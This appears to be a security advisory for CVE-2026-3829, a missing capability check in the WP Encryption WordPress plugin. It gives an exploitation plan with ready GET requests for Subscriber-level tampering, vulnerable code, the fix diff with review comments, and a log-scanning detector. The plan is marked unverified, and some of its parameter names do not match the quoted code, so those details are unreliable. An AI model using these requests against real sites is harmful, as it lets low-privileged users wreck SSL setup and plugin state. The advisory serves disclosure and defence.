CVE-2026-3829

WP Encryption - One Click SSL & Force HTTPS <= 7.8.5.10 - Missing Authorization to Authenticated (Subscriber+) SSL Setup Tampering

Vulnerability type: Missing Authorization
CVSS Score: 5.4
Severity: medium
Patched in: 7.8.5.11
Time to patch: 1d

Description

The WP Encryption – One Click Free SSL Certificate & SSL / HTTPS Redirect, Security & SSL Scan plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on the 'wple_basic_get_requests' function in all versions up to, and including, 7.8.5.10. This makes it possible for authenticated attackers, with subscriber level access and above, to reset the SSL setup state, force SSL to appear complete, and modify plan selection options.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: Low

Technical Details

Affected versions: <= 7.8.5.10
Published: May 13, 2026
Last updated: May 14, 2026
Affected plugin: wp-letsencrypt-ssl

What Changed in the Fix

Changes introduced in v7.8.5.11

Source Code

WordPress.org SVN
Research Plan
Unverified

Exploitation Research Plan: CVE-2026-3829 - WP Encryption Missing Authorization

1. Vulnerability Summary

The WP Encryption – One Click Free SSL Certificate plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check in the wple_basic_get_requests function. This function is hooked to admin_init, which executes for any authenticated user (including Subscribers) visiting an admin page (e.g., /wp-admin/index.php or /wp-admin/admin-ajax.php). Because the function lacks a current_user_can('manage_options') check, a Subscriber-level attacker can manipulate internal plugin options, reset the SSL configuration, and change the selected plugin plan.

2. Attack Vector Analysis

  • Endpoint: Any URL within the /wp-admin/ directory (e.g., /wp-admin/admin.php, /wp-admin/index.php).
  • Hook: admin_init (triggered by the WPLE_Admin class).
  • Vulnerable Function: WPLE_Admin::wple_basic_get_requests.
  • Payload Parameters:
    • wple_reset_all: Used to reset plugin settings.
    • wple_plan_choose: Used to update the plugin plan option.
    • wple_stage: Used to update the current SSL setup stage.
  • Authentication: Authenticated (Subscriber or higher). No nonces are enforced on these specific GET parameters within the vulnerable function.

3. Code Flow

  1. Hook Registration: In admin/le_admin.php, the WPLE_Admin class registers the handler:
    add_action( 'admin_init', [$this, 'wple_basic_get_requests'] );
    
  2. Execution: When a Subscriber logs in and visits /wp-admin/, WordPress fires admin_init.
  3. Missing Check: wple_basic_get_requests (located in admin/le_admin.php) processes $_GET parameters. Unlike the handlers in le_handlers.php (e.g., primary_ssl_install_request) which explicitly check for manage_options and nonces, this function proceeds directly to database operations:
    • If $_GET['wple_reset_all'] is present, it deletes/resets options.
    • If $_GET['wple_plan_choose'] is present, it calls update_option( 'wple_plan_choose', ... ).
    • If $_GET['wple_stage'] is present, it calls update_option( 'wple_stage', ... ).

4. Nonce Acquisition Strategy

The vulnerability exists because wple_basic_get_requests does not check for nonces or capabilities. Therefore, no nonce is required to exploit this specific vulnerability.

5. Exploitation Strategy

Step 1: Authentication

Log in as a Subscriber-level user.

Step 2: Plan Tampering

The attacker can change the plugin's "chosen plan" to simulate a Pro or specific state.

  • Request:
    GET /wp-admin/index.php?wple_plan_choose=pro HTTP/1.1
    Host: localhost
    Cookie: [Subscriber Cookies]
    

Step 3: SSL Setup Tampering

The attacker can force the plugin to believe the SSL setup is complete.

  • Request:
    GET /wp-admin/index.php?wple_stage=success HTTP/1.1
    Host: localhost
    Cookie: [Subscriber Cookies]
    

Step 4: Configuration Reset (Denial of Service)

The attacker can wipe existing SSL configurations.

  • Request:
    GET /wp-admin/index.php?wple_reset_all=1 HTTP/1.1
    Host: localhost
    Cookie: [Subscriber Cookies]
    

6. Test Data Setup

  1. Target: WordPress with wp-letsencrypt-ssl plugin version <= 7.8.5.10 installed and activated.
  2. Setup Admin State:
    • Use wp option update wple_plan_choose "free" to set an initial state.
    • Use wp option update wple_stage "step1" to set an initial stage.
  3. Attacker Account:
    • wp user create attacker attacker@example.com --role=subscriber --user_pass=password123

7. Expected Results

  • After Step 2, the WordPress database should show wple_plan_choose set to pro.
  • After Step 3, the WordPress database should show wple_stage set to success.
  • After Step 4, plugin options like wple_opts or wple_stage should be reset or deleted.
  • The HTTP response will be a standard 200 OK or 302 Redirect for a dashboard page, as the logic runs transparently in the background.

8. Verification Steps

After sending the HTTP requests, verify the changes via WP-CLI:

# Verify Plan Tampering
wp option get wple_plan_choose
# Expected output: pro

# Verify Stage Tampering
wp option get wple_stage
# Expected output: success

# Verify Reset (if wple_reset_all was sent)
wp option get wple_opts
# Expected output: Error: Could not get "wple_opts" option (or empty array)

9. Alternative Approaches

If the plugin logic requires specific values for the parameters:

  1. Plan IDs: Try business, developer, or premium as values for wple_plan_choose.
  2. Intermediate Stages: Set wple_stage to failed_httpverification_1 to trigger error states or specific admin notices for legitimate administrators, causing confusion or disruption.
  3. Other Params: Search for other $_GET or $_REQUEST parameters in admin/le_admin.php that do not have current_user_can guards.

Research Findings

Static analysis, not yet PoC-verified

Summary

The WP Encryption plugin for WordPress is vulnerable to unauthorized data modification because the 'wple_basic_get_requests' and 'wple_intro_pricing_handler' functions lack capability checks. Authenticated attackers with subscriber-level access can manipulate plugin options, reset SSL configurations, or change the plugin's license plan via simple GET requests to the admin dashboard.

Vulnerable Code

// admin/le_admin.php (vulnerable logic within wple_basic_get_requests)
if ( isset( $_GET['restart'] ) ) {
    //click to restart from beginning
    delete_option( 'wple_ssl_screen' );
    wp_redirect( admin_url( '/admin.php?page=wp_encryption' ), 302 );
    exit;
}
if ( isset( $_GET['force_complete'] ) ) {
    //Forced SSL completion flag
    update_option( 'wple_ssl_screen', 'success' );
    update_option( 'wple_backend', 1 );
    WPLE_Trait::clear_all_renewal_crons( true );
    wp_redirect( admin_url( '/admin.php?page=wp_encryption' ), 302 );
    exit;
}

---

// admin/le_handlers.php (around line 158)
public function wple_intro_pricing_handler() {
    $goplan = '';
    if ( isset( $_GET['gofree'] ) ) {
        set_transient( 'wple_plan_chosen', true, 7 * DAY_IN_SECONDS );
        update_option( 'wple_plan_choose', 'free' );
        $goplan = 'free';
    }
    if ( isset( $_GET['gopro'] ) ) {
        set_transient( 'wple_plan_chosen', true, 7 * DAY_IN_SECONDS );
        update_option( 'wple_plan_choose', 'pro' );
        $goplan = 'pro';
    }
    // ... further updates without capability checks

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/wp-letsencrypt-ssl/7.8.5.10/admin/le_admin.php /home/deploy/wp-safety.org/data/plugin-versions/wp-letsencrypt-ssl/7.8.5.11/admin/le_admin.php
--- /home/deploy/wp-safety.org/data/plugin-versions/wp-letsencrypt-ssl/7.8.5.10/admin/le_admin.php	2026-02-04 10:53:04.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/wp-letsencrypt-ssl/7.8.5.11/admin/le_admin.php	2026-03-12 07:29:48.000000000 +0000
@@ -1314,18 +1314,13 @@
         //since 5.1.0
         if ( isset( $_GET['restart'] ) ) {
             //click to restart from beginning
+            if ( !current_user_can( 'manage_options' ) ) {
+                exit( 'Unauthorized request' );
+            }
             delete_option( 'wple_ssl_screen' );
             wp_redirect( admin_url( '/admin.php?page=wp_encryption' ), 302 );
             exit;
         }
-        if ( isset( $_GET['force_complete'] ) ) {
-            //Forced SSL completion flag
-            update_option( 'wple_ssl_screen', 'success' );
-            update_option( 'wple_backend', 1 );
-            WPLE_Trait::clear_all_renewal_crons( true );
-            wp_redirect( admin_url( '/admin.php?page=wp_encryption' ), 302 );
-            exit;
-        }
 
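Review bot: the restart branch now refuses non-admins, but it still fires on a bare GET parameter with no nonce, so an administrator who opens a crafted /wp-admin/ link would reset the SSL screen; the research plan above notes that the handlers in le_handlers.php check both manage_options and a nonce, and this branch should match them. Suggest adding `check_admin_referer()` (with a nonce action of the plugin's choosing) next to the new capability check, and replacing `exit( 'Unauthorized request' )` with `wp_die( 'Unauthorized request', '', 403 )` so the refusal carries a proper status code rather than a 200 with a bare string. Removing the force_complete branch outright, rather than gating it, is the safer choice for that path since it existed only to mark SSL setup as complete without performing it.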
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/wp-letsencrypt-ssl/7.8.5.10/admin/le_handlers.php /home/deploy/wp-safety.org/data/plugin-versions/wp-letsencrypt-ssl/7.8.5.11/admin/le_handlers.php
--- /home/deploy/wp-safety.org/data/plugin-versions/wp-letsencrypt-ssl/7.8.5.10/admin/le_handlers.php	2026-02-04 10:53:04.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/wp-letsencrypt-ssl/7.8.5.11/admin/le_handlers.php	2026-03-12 07:29:48.000000000 +0000
@@ -158,6 +157,11 @@
      * @return void
      */
     public function wple_intro_pricing_handler() {
+        if ( isset( $_GET['gofree'] ) || isset( $_GET['gopro'] ) || isset( $_GET['gofirewall'] ) || isset( $_GET['gositelock'] ) ) {
+            if ( !current_user_can( 'manage_options' ) ) {
+                exit( 'Unauthorized request' );
+            }
+        }

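Review bot: the new guard only covers the four plan parameters, so any other $_GET value this function handles further down (the excerpt above ends with "further updates without capability checks") remains reachable by a Subscriber through admin_init. Because the handler runs on every admin page load, an unconditional `exit` at the top of the function would break the dashboard for non-admins; instead open `wple_intro_pricing_handler()` with `if ( ! current_user_can( 'manage_options' ) ) { return; }` so that every branch is covered, and pair the plan switches with `check_admin_referer()` as the other handlers in le_handlers.php already do. As in the le_admin.php hunk, `exit( 'Unauthorized request' )` should become a `wp_die()` with a 403 status.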
Exploit Outline

The exploit leverages the fact that admin_init hooks run for all authenticated users visiting any /wp-admin/ URL, and the targeted functions fail to verify that the user has administrative privileges.

  1. Authentication: An attacker logs into the WordPress site with a low-privileged account (e.g., Subscriber).
  2. Identify Target Parameters: The attacker targets the GET parameters processed in WPLE_Admin::wple_basic_get_requests and WPLE_Handler::wple_intro_pricing_handler.
  3. Payload Construction: The attacker constructs a URL including specific parameters:
    • ?force_complete=1: To force the plugin to believe SSL setup is successful.
    • ?restart=1: To reset the current SSL screen state.
    • ?gopro=1: To change the plugin's internal plan state to 'pro'.
    • ?wple_reset_all=1: (If active in the specific version) To wipe plugin configurations.
  4. Execution: The attacker visits /wp-admin/index.php appended with the malicious parameters. Since no nonce or capability check exists, the plugin executes the update_option or delete_option calls immediately based on the provided URL parameters.
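Because the vulnerable handlers act on plain GET parameters, the tampering described above leaves a clear trace in web-server access logs. The following scanner is an added example (not code from this page or from the plugin) that flags /wp-admin/ requests carrying any of the parameter names taken from the vulnerable code and the fix diff; the combined log format and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# GET parameters the unpatched plugin (<= 7.8.5.10) acted on from admin_init
# without a capability check; names come from the vulnerable code and fix diff.
TAMPER_PARAMS = frozenset({
    "restart", "force_complete",                      # wple_basic_get_requests
    "gofree", "gopro", "gofirewall", "gositelock",    # wple_intro_pricing_handler
})

# Apache/nginx combined log format (assumed): client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def tamper_params(target: str) -> list:
    """Tampering parameters in a request target, only if it points into /wp-admin/.
    The hooks run on admin_init, so the same names on a front-end URL are inert.
    Blank values count: PHP isset() is true for an empty string."""
    parts = urlsplit(target)
    if not parts.path.startswith("/wp-admin/"):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)
    return sorted(TAMPER_PARAMS.intersection(query))


def scan_log(lines) -> list:
    """One finding per log line that carries a tampering parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        hits = tamper_params(m["target"])
        if hits:
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                             "path": urlsplit(m["target"]).path, "params": hits})
    return findings


# Constructed sample traffic (not captured from a real site).
SAMPLE_LOG = """\
203.0.113.7 - - [13/May/2026:10:01:02 +0000] "GET /wp-admin/index.php?force_complete=1 HTTP/1.1" 302 0
203.0.113.7 - - [13/May/2026:10:01:05 +0000] "GET /wp-admin/index.php?gopro=1&restart= HTTP/1.1" 302 0
198.51.100.4 - - [13/May/2026:10:02:11 +0000] "GET /wp-admin/admin.php?page=wp_encryption HTTP/1.1" 200 5120
198.51.100.4 - - [13/May/2026:10:03:40 +0000] "GET /?restart=1 HTTP/1.1" 200 3071
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{f['ts']} {f['ip']} {f['path']} params={','.join(f['params'])} status={f['status']}")
```

On a site already running 7.8.5.11 a hit from a non-admin ends in the plugin's "Unauthorized request" exit, so a finding is still worth correlating with the logged-in user and with the current wple_ssl_screen and wple_plan_choose option values.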